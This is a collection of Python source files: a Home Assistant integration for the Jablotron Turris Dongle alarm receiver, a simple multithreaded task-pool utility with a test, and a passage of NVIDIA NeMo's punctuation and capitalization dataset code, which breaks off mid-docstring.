self.logger.ERROR(str(e))
continue
self.workerPool = []
if self.manager:
self.manager.shutdown()
|
jablo_dongle.py
|
"""
homeassistant.components.jablo_dongle
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Implements support for Turris Dongle by Jablotron Alarms, a.s.
"""
from enum import Enum
import logging
import threading
from threading import Condition, Lock
from pydispatch import dispatcher
import serial
from serial.serialutil import SerialException
from homeassistant.const import (EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP, EVENT_PLATFORM_DISCOVERED,
ATTR_SERVICE, ATTR_DISCOVERED)
from homeassistant.helpers.entity_component import EntityComponent
oldfw = False
DOMAIN = "jablo_dongle"
DEPENDENCIES = []
SERIAL_PORT = "port"
MESSAGE_RECEIVED_SIGNAL = 'ja_msg_recv_sig'
_LOGGER = logging.getLogger(__name__)
NETWORK = None
DISCOVER_SENSORS = "jablo_dongle.sensors"
DISCOVER_THERMOSTATS = "jablo_dongle.thermostats"
def peripheries_setup(hass, config):
""" This method does initialization of components that use discovery.
Calling component setup from here is maybe a bit hacky, however current version
of HA does not allow any simple way of doing this from third-party components
(i.e. modification sensor.__init__/thermostat.__init__ is needed otherwise).
"""
from homeassistant.components.thermostat import (
SCAN_INTERVAL as THERMOSTAT_SCAN_INTERVAL,
DOMAIN as THERMOSTAT_DOMAIN
)
thermostats = EntityComponent(_LOGGER, THERMOSTAT_DOMAIN, hass, THERMOSTAT_SCAN_INTERVAL, discovery_platforms={
DISCOVER_THERMOSTATS: 'jablo_dongle'
})
thermostats.setup(config)
from homeassistant.components.sensor import (
SCAN_INTERVAL as SENSOR_SCAN_INTERVAL,
DOMAIN as SENSOR_DOMAIN
)
sensors = EntityComponent(_LOGGER, SENSOR_DOMAIN, hass, SENSOR_SCAN_INTERVAL, discovery_platforms={
DISCOVER_SENSORS: 'jablo_dongle'
})
sensors.setup(config)
def setup(hass, config):
""" Setup component. """
global NETWORK
NETWORK = JabloDongle(hass, config[DOMAIN][SERIAL_PORT])
def stop_dongle(event):
""" Stop Modbus service. """
NETWORK.disconnect()
def start_dongle(event):
""" Start Modbus service. """
if NETWORK.connect() is False:
return False
NETWORK.read_slots()
NETWORK.insert_devices()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_dongle)
return True
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, start_dongle)
peripheries_setup(hass, config)
# Tells the bootstrapper that the component was successfully initialized
return True
class TxState:
def __init__(self):
self.enroll = False
self.pgx = False
self.pgy = False
self.alarm = False
self.beep = 'NONE'
class JabloDongle:
def __init__(self, hass, port):
self._hass = hass
self._portname = port
self._serial = None
self._readthread = None
self.last_mid = 0
self.last_mtype = JaMtype.UNDEF
self.tx_state = TxState()
self.slots = []
self.slot_read_cond = Condition()
self._tx_lock = Lock()
def serial_read_loop(self):
while True:
data = self._serial.readline().decode('ascii', 'replace')
if len(data) == 1:
continue
# _LOGGER.error("Received data: %s" % (data))
jmsg = JaMessage(data)
if jmsg.mid is None and \
(jmsg.mtype != NETWORK.last_mtype or (jmsg.mtype != JaMtype.SET and jmsg.mtype != JaMtype.INT)):
NETWORK.process_message(jmsg)
NETWORK.last_mtype = jmsg.mtype
elif jmsg.mid != NETWORK.last_mid:
NETWORK.process_message(jmsg)
NETWORK.last_mid = jmsg.mid
def connect(self):
try:
self._serial = serial.Serial(self._portname, 57600)
except SerialException as ex:
_LOGGER.error("Cannot open serial port %s (%s)" % (self._portname, ex))
return False
# self._serial.flush()
_LOGGER.info("Serial port %s opened" % self._portname)
self._readthread = threading.Thread(target=self.serial_read_loop)
self._readthread.start()
_LOGGER.info("Receiving thread started")
return True
# self.transmit_state()
def disconnect(self):
self._serial.close()
def process_message(self, jmsg):
if jmsg.mtype == JaMtype.UNDEF:
_LOGGER.warning("Unknown message received: '%s'", jmsg.text.encode('utf-8'))
return
if jmsg.mtype != JaMtype.SLOT \
and jmsg.mtype != JaMtype.VERSION \
and jmsg.mtype != JaMtype.OK \
and jmsg.mtype != JaMtype.ERR:
_LOGGER.info("Received message of type %s from device %d (%s)" % (jmsg.mtype, jmsg.did, jmsg.devmodel))
if jmsg.mtype == JaMtype.SLOT:
if jmsg.slotval is not None:
_LOGGER.info(
"Slot %d: %d (%s)" % (jmsg.slotnum, jmsg.slotval, JaDevice.get_model_from_id(jmsg.slotval)))
self.slots.append({'num': jmsg.slotnum, 'dev': JaDevice(jmsg.slotval)})
self.slot_read_cond.acquire()
self.slot_read_cond.notify()
self.slot_read_cond.release()
else:
dispatcher.send(MESSAGE_RECEIVED_SIGNAL, **{'jmsg': jmsg})
def transmit_state(self):
tx_string = "\nTX ENROLL:%d PGX:%d PGY:%d ALARM:%d BEEP:%s\n" % (
self.tx_state.enroll, self.tx_state.pgx, self.tx_state.pgy, self.tx_state.alarm, self.tx_state.beep
)
self._tx_lock.acquire()
self._serial.write(tx_string.encode())
self._serial.flush()
self._tx_lock.release()
def read_slots(self):
for i in range(32):
self._serial.write(("\nGET SLOT:%02d\n" % i).encode())
self._serial.flush()
self.slot_read_cond.acquire()
self.slot_read_cond.wait()
self.slot_read_cond.release()
def insert_devices(self):
for slot in self.slots:
jdev = slot['dev']
if jdev.model == "TP-82N":
self._hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: DISCOVER_THERMOSTATS,
ATTR_DISCOVERED: {
'did': jdev.did,
'model': jdev.model
}
})
else:
self._hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: DISCOVER_SENSORS,
ATTR_DISCOVERED: {
'did': jdev.did,
'model': jdev.model
}
})
class JaMtype(Enum):
UNDEF = 0
ARM = 1
DISARM = 2
BEACON = 3
SENSOR = 4
TAMPER = 5
PANIC = 6
DEFECT = 7
BUTTON = 8
SET = 9
INT = 10
OK = 11
ERR = 12
SLOT = 13
VERSION = 14
class JaMessage:
def __init__(self, msgline):
self._text = msgline.rstrip()
self.did = None
self.mid = None
self.devmodel = None
self.mtype = JaMtype.UNDEF
self.act = None
self.lb = None
self.blackout = None
self.temp = None
self.slotnum = None
self.slotval = None
self.version = None
try:
if self.text == "OK":
self.mtype = JaMtype.OK
elif self.text == "ERROR":
self.mtype = JaMtype.ERR
elif self.text.startswith("TURRIS DONGLE V"):
self.mtype = JaMtype.VERSION
self.version = self.text[15:-1]
elif self.text.startswith("SLOT:"):
self.mtype = JaMtype.SLOT
self.slotnum = int(self.text[5:7], base=10)
try:
self.slotval = int(self.text[9:17], base=10)
except ValueError:
self.slotval = None
else:
tokens = self.text.split()
self.did = int(tokens[0][1:-1], 10)
# Hack to support old fw, remove in final version
global oldfw
if oldfw:
if tokens[1] != "ID:---":
self.mid = int(tokens[1][3:], 10)
self.devmodel = tokens[2]
else:
self.devmodel = tokens[1]
if oldfw:
if tokens[3] == "SENSOR":
self.mtype = JaMtype.SENSOR
elif tokens[3] == "TAMPER":
self.mtype = JaMtype.TAMPER
elif tokens[3] == "BEACON":
self.mtype = JaMtype.BEACON
elif tokens[3] == "BUTTON":
self.mtype = JaMtype.BUTTON
elif tokens[3] == "ARM:1":
self.mtype = JaMtype.ARM
elif tokens[3] == "ARM:0":
self.mtype = JaMtype.DISARM
elif tokens[3][0:4] == "SET:":
self.mtype = JaMtype.SET
if len(tokens[3]) > 4:
self.temp = float(tokens[3][4:8])
else:
self.temp = float(tokens[4][0:3])
elif tokens[3][0:4] == "INT:":
self.mtype = JaMtype.INT
if len(tokens[3]) > 4:
self.temp = float(tokens[3][4:8])
else:
self.temp = float(tokens[4][0:3])
else:
self.mtype = JaMtype.UNDEF
else:
if tokens[2] == "SENSOR":
self.mtype = JaMtype.SENSOR
elif tokens[2] == "TAMPER":
self.mtype = JaMtype.TAMPER
elif tokens[2] == "BEACON":
self.mtype = JaMtype.BEACON
elif tokens[2] == "BUTTON":
self.mtype = JaMtype.BUTTON
elif tokens[2] == "ARM:1":
self.mtype = JaMtype.ARM
elif tokens[2] == "ARM:0":
self.mtype = JaMtype.DISARM
elif tokens[2][0:4] == "SET:":
self.mtype = JaMtype.SET
if len(tokens[2]) > 4:
self.temp = float(tokens[2][4:8])
else:
self.temp = float(tokens[3][0:3])
elif tokens[2][0:4] == "INT:":
self.mtype = JaMtype.INT
if len(tokens[2]) > 4:
self.temp = float(tokens[2][4:8])
else:
self.temp = float(tokens[3][0:3])
else:
self.mtype = JaMtype.UNDEF
for token in tokens[3:]:
if token.startswith("LB:"):
self.lb = int(token[3:])
elif token.startswith("ACT:"):
self.act = int(token[4:])
elif token.startswith("BLACKOUT:"):
self.act = int(token[9:])
except Exception:
self.mtype = JaMtype.UNDEF
@property
def text(self):
return self._text
class JaDevice:
def __init__(self, did):
self.did = did
self.model = self.get_model_from_id(did)
@staticmethod
def get_model_from_id(did):
if 0x800000 <= did <= 0x87FFFF:
return "RC-86K"
elif 0x900000 <= did <= 0x97FFFF:
return "RC-86K"
elif 0x180000 <= did <= 0x1BFFFF:
return "JA-81M"
elif 0x1C0000 <= did <= 0x1DFFFF:
return "JA-83M"
elif 0x640000 <= did <= 0x65FFFF:
return "JA-83P"
elif 0x7F0000 <= did <= 0x7FFFFF:
return "JA-82SH"
elif 0x760000 <= did <= 0x76FFFF:
return "JA-85ST"
elif 0x580000 <= did <= 0x59FFFF:
return "JA-80L"
elif 0xCF0000 <= did <= 0xCFFFFF:
return "AC-88"
elif 0x240000 <= did <= 0x25FFFF:
return "TP-82N"
else:
return "Unknown"
|
contractor.py
|
#!/usr/bin/env python
#coding:utf-8
"""
Author: --<v1ll4n>
Purpose: Provide some useful thread utils
Created: 2016/10/29
"""
import uuid
import time
import unittest
from Queue import Queue
import threading
from threading import Thread
import inspect
#----------------------------------------------------------------------
def start_thread(func, *args, **kwargs):
""""""
Thread(target=func, args=args, kwargs=kwargs).start()
########################################################################
class Contractor(object):
"""Create Multi-Thread to support the
concurrence of many tasks"""
#----------------------------------------------------------------------
def __init__(self, thread_max=50):
"""Constructor"""
self.task_list = []
self.result_queue = Queue()
self.signal_name = self._uuid1_str()
self.lock = threading.Lock()
self.thread_max = thread_max
self.current_thread_count = 0
def _uuid1_str(self):
'''Returns: random UUID tag '''
return str(uuid.uuid1())
def add_task(self, func, *args, **argv):
'''Add task to Pool and wait to exec
Params:
func : A callable obj, the entity of the current task
args : the args of [func]
argv : the argv of [func]
'''
assert callable(func), '[!] Function can \'t be called'
ret = {}
ret['func'] = func
ret['args'] = args
ret['argv'] = argv
ret['uuid'] = self.signal_name
self.task_list.append(ret)
def run(self):
""""""
Thread(target=self._run).start()
return self.result_queue
#----------------------------------------------------------------------
def _run(self):
""""""
for i in self.task_list:
#print self.current_thread_count
while self.thread_max <= self.current_thread_count:
time.sleep(0.3)
self._start_task(i)
def _start_task(self, task):
""""""
self.current_thread_count = self.current_thread_count + 1
try:
Thread(target=self._worker, args=(task,)).start()
except TypeError:
self.current_thread_count = self.current_thread_count - 1
def _worker(self, dictobj):
""""""
func = dictobj['func']
args = dictobj['args']
argv = dictobj['argv']
result = func(*args, **argv)
self.lock.acquire()
self._add_result_to_queue(result=result)
self.lock.release()
def _add_result_to_queue(self, **kw):
""""""
assert kw.has_key('result'), '[!] Result Error!'
self.result_queue.put(kw['result'])
self.current_thread_count = self.current_thread_count - 1
class UtilsTest(unittest.case.TestCase):
def runTest(self):
ms = inspect.getmembers(self)
ms = map(lambda x: x[0], ms)
for i in ms:
if callable(getattr(self,i)):
if i.startswith('test_'):
getattr(self, i)()
def test_pool(self):
def demo_task(*args):
'''simulate the plugin.run'''
print '[!] Computing!'
time.sleep(args[0])
print '[!] Finished!'
print
returns = 'Runtime Length : %s' % str(args)
return returns
pool = Contractor()
pool.add_task(demo_task, 7)
pool.add_task(demo_task, 3)
q = pool.run()
print pool.current_thread_count
self.assertIsInstance(q, Queue)
r = q.get()
print r
self.assertIsInstance(r, str)
r = q.get()
print r
self.assertIsInstance(r, str)
print pool.current_thread_count
if __name__ == '__main__':
unittest.main()
|
punctuation_capitalization_dataset.py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'BertPunctuationCapitalizationDataset',
'LABEL_ID_DIR_FOR_NEMO_CHECKPOINT',
'Progress',
'PunctuationCapitalizationEvalDataConfig',
'PunctuationCapitalizationTrainDataConfig',
'create_label_ids',
'create_masks_and_segment_ids',
'is_legacy_data_config',
'legacy_data_config_to_new_data_config',
'load_label_ids',
'raise_not_equal_labels_error',
'save_label_ids',
]
import itertools
import multiprocessing as mp
import os
import pickle
import random
from dataclasses import dataclass
from math import ceil
from pathlib import Path
from queue import Empty
from time import sleep
from typing import Any, Dict, List, Optional, Set, Tuple, Union
import numpy as np
import torch
from omegaconf import MISSING, DictConfig, OmegaConf
from tqdm import tqdm
from nemo.collections.common.tokenizers.tokenizer_spec import TokenizerSpec
from nemo.collections.nlp.data.data_utils.data_preprocessing import get_label_stats, get_stats
from nemo.core.classes import Dataset
from nemo.core.neural_types import ChannelType, LabelsType, MaskType, NeuralType
from nemo.utils import logging
MAX_NUM_QUERIES_IN_SPLIT = 10 ** 4
TOKENIZATION_PROGRESS_REPORT_PERIOD = 10 ** 3
BATCH_MARK_UP_PROGRESS_REPORT_PERIOD = 10 ** 4
BATCH_BUILDING_PROGRESS_REPORT_PERIOD = 10 ** 4
LABEL_ID_DIR_FOR_NEMO_CHECKPOINT = "label_id_files_for_nemo_checkpoint"
@dataclass
class PunctuationCapitalizationDataConfigBase:
"""A base class for punctuation and capitalization data configs. This class does not define ``ds_item``
attribute which works differently for train and evaluation data."""
#################################################
# COMMON DATASET PARAMETERS
#################################################
use_tarred_dataset: bool = MISSING
"""Whether to use tarred dataset. If True, then you should provide ``tar_metadata_file``. Otherwise, you should
provide ``text_file``, ``labels_file``, ``tokens_in_batch``."""
label_info_save_dir: Optional[str] = None
"""A path to a directory where files created during dataset processing are stored. These files include label id
files and label stats files. By default, it is a directory containing ``text_file`` or ``tar_metadata_file``.
You may need this parameter if dataset directory is read-only and thus does not allow saving anything near dataset
files"""
#################################################
# REGULAR DATASET PARAMETERS
#################################################
text_file: Optional[str] = None
"""A path to a file with source text data without punctuation and capitalization."""
labels_file: Optional[str] = None
"""A path to a file with punctuation and capitalization labels in NeMo format. NeMo format is described in
`documentation
<https://docs.nvidia.com/deeplearning/nemo/user-guide/docs/en/main/nlp/punctuation_and_capitalization.html#nemo-data-format>`_
"""
tokens_in_batch: Optional[int] = None
"""Number of tokens in a batch including paddings and special tokens ([CLS], [SEP], [UNK]). This config does
not have ``batch_size`` parameter."""
max_seq_length: int = 512
"""Max number of tokens in a source sequence. ``max_seq_length`` includes [CLS] and [SEP] tokens. Sequences
which are too long will be clipped by removal of tokens from the end of a sequence."""
num_samples: int = -1
"""A number of samples loaded from ``text_file`` and ``labels_file`` which are used in the dataset. If this
parameter equals ``-1``, then all samples are used."""
use_cache: bool = True
"""Whether to use pickled features. If pickled features does not exist, then pickled features will be created.
For large regular datasets, pickled features may considerably reduce time for training starting. Tokenization
of source sequences is not fast because sequences are split into words before tokenization. For even larger
datasets (~4M), tarred datasets are recommended."""
cache_dir: Optional[str] = None
"""A path to a directory containing cache or directory where newly created cache is saved. By default, it is
a directory containing ``text_file``. You may need this parameter if cache for a dataset is going to be created
and the dataset directory is read-only.
``cache_dir`` and ``label_info_save_dir`` are separate parameters for the case when a cache is ready and this cache
is stored in a read only directory. In this case you will separate ``label_info_save_dir``."""
get_label_frequences: bool = False
"""Whether to show and save label frequencies. Frequencies are showed if ``verbose`` parameter is ``True``. If
``get_label_frequencies=True``, then frequencies are saved into ``label_info_save_dir``"""
verbose: bool = True
"""If ``True`` dataset instance will print progress messages and examples of acquired features."""
n_jobs: Optional[int] = 0
"""Number of workers used for features creation (tokenization, label encoding, and clipping). If 0, then
multiprocessing is not used; if ``None``, then n_jobs is equal to the number of CPU cores.
There can be weird deadlocking errors with some tokenizers (e.g. SentencePiece) if ``n_jobs`` is greater than zero.
"""
#################################################
# TARRED DATASET PARAMETERS
#################################################
tar_metadata_file: Optional[str] = None
"""A path to tarred dataset metadata file. Tarred metadata file and other parts of tarred dataset are usually
created by the script
`examples/nlp/token_classification/data/create_punctuation_capitalization_tarred_dataset.py
<https://github.com/NVIDIA/NeMo/blob/main/examples/nlp/token_classification/data/create_punctuation_capitalization_tarred_dataset.py>`_
"""
tar_shuffle_n: int = 1
"""The size of shuffle buffer of `webdataset`. The number of batches which are permuted."""
#################################################
# PYTORCH DATALOADER PARAMETERS
#################################################
shuffle: bool = True
"""Shuffle batches every epoch. For regular training datasets, the parameter also activates batch repacking every
epoch. For tarred dataset, it would be only batches permutation."""
drop_last: bool = False
"""In cases when data parallelism is used, ``drop_last`` defines the way data pipeline behaves when some replicas
are out of data and some are not. If ``drop_last`` is ``True``, then epoch ends in the moment when any replica runs
out of data. If ``drop_last`` is ``False``, then the replica will replace missing batch with a batch from a pool of
batches that the replica has already processed. If data parallelism is not used, then parameter ``drop_last`` does
not do anything. For more information see ``torch.utils.data.distributed.DistributedSampler``"""
pin_memory: bool = True
"""See ``torch.utils.data.DataLoader`` documentation."""
num_workers: int = 8
"""See ``torch.utils.data.DataLoader`` documentation."""
persistent_workers: bool = True
"""See ``torch.utils.data.DataLoader`` documentation."""
@dataclass
class PunctuationCapitalizationTrainDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[str] = MISSING
"""Path to a directory where `tar_metadata_file` or `text_file` and `labels_file` lay."""
@dataclass
class PunctuationCapitalizationEvalDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[Any] = MISSING
"""Path to a directory where `tar_metadata_file` or `text_file` and `labels_file` lay. ``Any`` = ``str`` or
``List[str]``. If a ``List[str]``, then the model is tested or validated on several datasets."""
def is_legacy_data_config(ds_section: DictConfig) -> bool:
return 'use_tarred_dataset' not in ds_section
def legacy_data_config_to_new_data_config(
ds_section: DictConfig, legacy_dataset_section: DictConfig, train: bool
) -> DictConfig:
"""
Transform old style dataset to new format dataset.
Args:
ds_section: a ds section (``train_ds``, or ``validation_ds``, or ``test_ds``) from old style config. Such
section contain ``batch_size`` parameter.
legacy_dataset_section: a ``model.dataset`` section. ``model.dataset`` section contains ``data_dir`` parameter
train: ``True`` if ``train_ds`` is transformed and ``False`` otherwise
Returns:
New format dataset based on either ``PunctuationCapitalizationTrainDataConfig`` (``train=True``) or
``PunctuationCapitalizationEvalDataConfig`` (``train=False``)
"""
if train:
cls = PunctuationCapitalizationTrainDataConfig
ds_item = legacy_dataset_section.get('data_dir')
else:
cls = PunctuationCapitalizationEvalDataConfig
ds_item = ds_section.get('ds_item')
ds_item = legacy_dataset_section.get('data_dir') if ds_item is None else ds_item
if ds_item is None:
raise ValueError(
f"Data directory was not found in legacy config.\nspecific dataset configuration:\n"
f"{OmegaConf.to_yaml(ds_section)}\nmodel.dataset:\n{OmegaConf.to_yaml(legacy_dataset_section)}"
)
new_config = OmegaConf.structured(
cls(
use_tarred_dataset=False,
text_file=ds_section.text_file,
labels_file=ds_section.labels_file,
ds_item=ds_item,
max_seq_length=legacy_dataset_section.get(
'max_seq_length', PunctuationCapitalizationDataConfigBase.max_seq_length
),
)
)
return new_config
def _check_number_of_labels(
words: List[str],
query: str,
qi: int,
split_i: int,
punctuation_labels: List[str],
capitalization_labels: List[str],
) -> None:
if len(words) != len(punctuation_labels):
raise ValueError(
f"Number of punctuation labels for a query number {qi} in a split number {split_i} is not equal to "
f"number of words. Number of words: {len(words)}, number of punctuation labels: "
f"{len(punctuation_labels)}. First 100 characters of the query: '{query[:100]}', punctuation labels: "
f"'{punctuation_labels}'"
)
if len(words) != len(capitalization_labels):
raise ValueError(
f"Number of capitalization labels for a query number {qi} in a split number {split_i} is not equal to "
f"number of words. Number of words: {len(words)}, number of capitalization labels: "
f"{len(capitalization_labels)}. First 100 characters of the query: '{query[:100]}', "
f"capitalization labels: '{capitalization_labels}'"
)
def _show_prog(queues: Tuple[mp.Queue, ...], totals: List[int], descriptions: List[str], units: List[str]) -> None:
"""
Show several ``tqdm`` progress bars.
Args:
queues: a list of queues by which progress is delivered into this function. Each queue is responsible for one
progress bar. ``show_prog`` function extracts integers from ``queues`` elements and adds them to progress
bars. If value extracted from a queue equals ``-1``, then corresponding progress bar is closed. When all
progress bars are closed, this function returns.
totals: list of values 100% of progress bars. See more in a description of ``total`` parameter of
``tqdm.tqdm`` function
descriptions: list of descriptions of progress bars. See more in a description of ``desc`` parameter of
``tqdm.tqdm`` function
units: list of progress bar units. See more in a description of ``unit`` parameter of ``tqdm.tqdm`` function
"""
if not all([len(queues) == len(v) for v in [totals, descriptions, units]]):
raise ValueError(
f"All of parameters `queues`, `total_num_lines`, `descriptions`, `units` have to have equal lengths. "
f"len(queues)={len(queues)}, len(total_num_lines)={len(totals)}, "
f"len(descriptions)={len(descriptions)}, len(units)={len(units)}."
)
prog = [
tqdm(total=tt, desc=dd, unit=uu, unit_scale=True, position=i)
for i, (tt, dd, uu) in enumerate(zip(totals, descriptions, units))
]
finished = [False] * len(queues)
while True:
for i, queue in enumerate(queues):
stop = False
to_add = 0
try:
v = queue.get(block=False)
while v != -1:
to_add += v
v = queue.get(block=False)
stop = True
except Empty:
if to_add == 0 and not stop:
continue
prog[i].n += to_add
prog[i].update(0)
if prog[i].n >= totals[i]:
finished[i] = True
prog[i].close()
if stop:
if prog[i].n < totals[i]:
logging.warning(
f"Progress with description '{descriptions[i]}' terminated before progress bar "
f"reached 100%. prog.n={prog[i].n}, total_num_lines={totals[i]}"
)
finished[i] = True
prog[i].close()
if all(finished):
break
sleep(0.1)
class Progress:
"""
Manages several ``tqdm`` progress bars for multi process tasks. This class can be used as context manager.
The class starts separate process which creates and updates progress bars. Information to progress process is
passed via multiprocessing queues. There is a separate queue for every progress bar.
You can use it as context manager:
.. code-block:: python
with Progress([10, 20], ["progress bar 1", "progress bar 2"], ["parrot", "frog"]) as progress_queues:
num_processes = 10
with multiprocessing.Pool(num_processes) as pool:
data = list(zip(my_data, [progress_queues[0]] * num_processes, [progress_queues[1]] * num_processes))
pool.starmap(worker_func, data)
Or without context manager:
.. code-block:: python
progress = Progress([10, 20], ["progress bar 1", "progress bar 2"], ["parrot", "frog"])
progress_queues = progress.get_queue()
num_processes = 10
with multiprocessing.Pool(num_processes) as pool:
data = list(zip(my_data, [progress_queues[0]] * num_processes, [progress_queues[1]] * num_processes))
pool.starmap(worker_func, data)
progress.finish()
In a worker function you will have to put number of processed items into the progress queues. For example:
.. code-block:: python
def worker_func(my_datum, parrot_progress_queue, frog_progress_queue):
...
for i in range(10):
parrot_progress_queue.put(1)
frog_progress_queue.put(2)
Progress bars and progress process are closed when ``finish`` or ``__exit__`` methods are called.
"""
def __init__(self, total: Union[int, List[int]], desc: Union[str, List[str]], unit: Union[str, List[str]]) -> None:
"""
Starts progress process and creates queues for passing information to the progress process. Number of progress
bars is equal to the max length of lists ``total``, ``desc``, ``unit``. If none of these parameters is a list,
then 1 progress bar is created.
Args:
total: a list of ``int`` which length is equal to the number of progress bars OR an ``int`` OR a list of
one ``int``. Number which comprises 100% of progress bar. When sum of values passed through the
corresponding queue equals ``total`` corresponding progress bar reaches 100%. If ``total`` is an
``int`` or a list of one element, then all progress bars have equal ``total`` parameter.
desc: a list of ``str`` which length is equal to the number of progress bars OR a ``str`` OR a list of one
``str``. Description of a progress bar which is showed as a prefix. See more in description of
parameter ``desc`` of function ``tqdm.tqdm``.
unit: a list of ``str`` which length is equal to the number of progress bars OR a ``str`` OR a list of one
``str``. A unit of a progress bar. See more in description of parameter ``unit`` of function
``tqdm.tqdm``.
"""
if not isinstance(total, list):
total = [total]
if not isinstance(desc, list):
desc = [desc]
if not isinstance(unit, list):
unit = [unit]
num_processes = max([len(total), len(desc), len(unit)])
for param in [total, desc, unit]:
if len(param) not in [num_processes, 1]:
raise ValueError(
f"If parameter of `Progress.__init__` method is a list, then it has to be the same length as other "
f"parameters which are lists"
)
if len(param) == 1:
param *= num_processes
manager = mp.Manager()
self.progress_queues = tuple(manager.Queue() for _ in range(num_processes))
self.progress_process = mp.Process(target=_show_prog, args=(self.progress_queues, total, desc, unit))
self.progress_process.start()
def __enter__(self) -> Tuple[mp.Queue, ...]:
return self.get_queues()
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
self.finish()
def get_queues(self) -> Tuple[mp.Queue, ...]:
return self.progress_queues
def finish(self) -> None:
for q in self.progress_queues:
q.put(-1)
self.progress_process.join()
class TokenizeCreateMasksClipWorker:
"""A worker for tokenization, encoding labels, creating masks for first token in a word, sequence clipping"""
def __init__(
self,
max_seq_length: int,
tokenizer: TokenizerSpec,
punct_label_ids: Optional[Dict[str, int]],
capit_label_ids: Optional[Dict[str, int]],
pad_label: str,
verbose: bool,
progress_queue: mp.Queue,
) -> None:
"""
Args:
max_seq_length: max number of tokens in an input sequence including [CLS] and [SEP] tokens. If number of
tokens in a sequence exceeds ``max_seq_length``, then excess tokens in the end of the sequence
are removed
tokenizer: a tokenizer instance which has properties ``cls_id``, ``pad_id``, ``sep_id``, ``unk_id``
punct_label_ids: dict to map punctuation labels to label ids. Starts with pad_label->0.
capit_label_ids: dict to map capitalization labels to label ids. Starts with pad_label->0.
pad_label: pad value use for labels. By default, it's the neutral label for punctuation and capitalization.
Its id in ``punct_label_ids`` and ``capit_label_ids`` has to be ``0``
verbose: whether to report when the worker finishes its job
progress_queue: a multiprocessing queue used for reporting progress. Useful for creating tarred dataset
"""
self.max_seq_length = max_seq_length
self.tokenizer = tokenizer
self.punct_label_ids = punct_label_ids
self.capit_label_ids = capit_label_ids
self.pad_label = pad_label
self.verbose = verbose
self.progress_queue = progress_queue
def _maybe_clip(self, values: List[int], append_value: int) -> List[int]:
if len(values) > self.max_seq_length:
return values[: self.max_seq_length - 1] + [append_value]
return values
def __call__(
self,
queries: List[str],
punct_label_lines: Optional[Union[List[str], Tuple[str, ...]]],
capit_label_lines: Optional[Union[List[str], Tuple[str, ...]]],
split_i: int,
) -> Tuple[np.ndarray, List[np.ndarray], List[np.ndarray], List[np.ndarray]]:
"""
Tokenize, clip, encode labels, and create masks of first tokens in words.
Args:
queries: text sequences
punct_label_lines: a list or a tuple of labels for every word in a sequence (str)
capit_label_lines: a list of a tuple labels for every word in a sequence (str)
split_i: number of a split which is processed. Used for logging
Returns:
input_ids: a list of 1D int32 arrays. Each array contains token ids of the corresponding query
subtokens_mask: a list of 1D boolean arrays. An array element is ``True`` if corresponding token is the
first token in a word
punct_labels: a list of 1D int32 arrays. Encoded punctuation labels for every token in a query. Tokens in
one word have identical labels
capit_labels: a list of 1D int32 arrays. Encoded capitalization labels for every token in a query. Tokens
in one word have identical labels
"""
all_input_ids, all_subtokens_mask, punct_all_labels, capit_all_labels = [], [], [], []
progress_made = 0
for i, query in enumerate(queries):
words = query.split()
input_ids, subtokens_mask = [self.tokenizer.cls_id], [0]
_check_number_of_labels(words, query, i, split_i, punct_label_lines[i], capit_label_lines[i])
pad_id = self.punct_label_ids[self.pad_label]
punct_labels = [pad_id]
punct_query_labels = [self.punct_label_ids[lab] for lab in punct_label_lines[i]]
capit_labels = [pad_id]
capit_query_labels = [self.capit_label_ids[lab] for lab in capit_label_lines[i]]
for j, word in enumerate(words):
word_ids = self.tokenizer.text_to_ids(word)
if not word_ids and len(word):
word_ids = [self.tokenizer.unk_id]
input_ids.extend(word_ids)
subtokens_mask.append(1)
subtokens_mask.extend([0] * (len(word_ids) - 1))
punct_labels.extend([punct_query_labels[j]] * len(word_ids))
capit_labels.extend([capit_query_labels[j]] * len(word_ids))
# add eos token
input_ids.append(self.tokenizer.sep_id)
subtokens_mask.append(0)
all_input_ids.append(np.array(self._maybe_clip(input_ids, self.tokenizer.sep_id), dtype=np.int32))
all_subtokens_mask.append(np.array(self._maybe_clip(subtokens_mask, 0), dtype=bool))
punct_labels.append(pad_id)
punct_all_labels.append(np.array(self._maybe_clip(punct_labels, pad_id), dtype=np.int32))
capit_labels.append(pad_id)
capit_all_labels.append(np.array(self._maybe_clip(capit_labels, pad_id), dtype=np.int32))
progress_made += 1
if progress_made >= TOKENIZATION_PROGRESS_REPORT_PERIOD:
self.progress_queue.put(progress_made)
progress_made = 0
self.progress_queue.put(progress_made)
if self.verbose:
logging.info(f"Finished processing data split number {split_i}")
return all_input_ids, all_subtokens_mask, punct_all_labels, capit_all_labels
def _get_features(
queries: Union[List[str], Tuple[str, ...]],
punct_label_lines: Union[List[str], Tuple[str, ...]],
capit_label_lines: Union[List[str], Tuple[str, ...]],
max_seq_length: int,
tokenizer: TokenizerSpec,
punct_label_ids: Dict[str, int] = None,
capit_label_ids: Dict[str, int] = None,
pad_label: str = 'O',
verbose: bool = True,
n_jobs: Optional[int] = 0,
progress_queue: Optional[mp.Queue] = None,
) -> Tuple[List[np.ndarray], List[np.ndarray], List[np.ndarray], List[np.ndarray]]:
"""
Tokenizes data, encodes labels, creates masks of first tokens in words, clips sequences by number of tokens.
Args:
queries: text sequences
max_seq_length: max number of tokens in an input sequence including [CLS] and [SEP] tokens. If number of tokens
in a sequence exceeds ``max_seq_length``, then excess tokens in the end of the sequence are removed
tokenizer: a tokenizer instance which has properties ``cls_id``, ``pad_id``, ``sep_id``, ``unk_id``
punct_label_ids: dict to map punctuation labels to label ids. Starts with pad_label->0.
capit_label_ids: dict to map capitalization labels to label ids. Starts with pad_label->0.
